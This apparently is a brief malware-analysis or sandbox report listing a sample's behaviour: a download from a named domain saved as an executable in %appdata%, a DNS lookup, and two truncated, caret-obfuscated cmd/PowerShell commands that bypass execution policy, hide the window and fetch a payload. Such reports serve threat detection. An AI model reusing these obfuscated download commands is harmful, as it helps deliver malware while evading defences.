Technical Information
- http://flowers-my.wang/search.php as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Pow^eRsh^e^LL.^EXe ^-EXE^CU^tiO^Npo^lIc^Y BypASs -NoPR^OFi^Le ^-W^IND^OW^STy^LE^ HId^dEN (NEW-o^bject^ ^SyS^T^e^m.neT^.^WeBc^liEn^t^).d^owNLOa^DFIlE('http://flowers-my.wang/search.php...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /c "Pow^eRsh^e^LL.^EXe ^-EXE^CU^tiO^Npo^lIc^Y BypASs -NoPR^OFi^Le ^-W^IND^OW^STy^LE^ HId^dEN (NEW-o^bject^ ^SyS^T^e^m.neT^.^WeBc^liEn^t^).d^owNLOa^DFIlE('http://flowers-my.wang/search.php...' (with hidden window)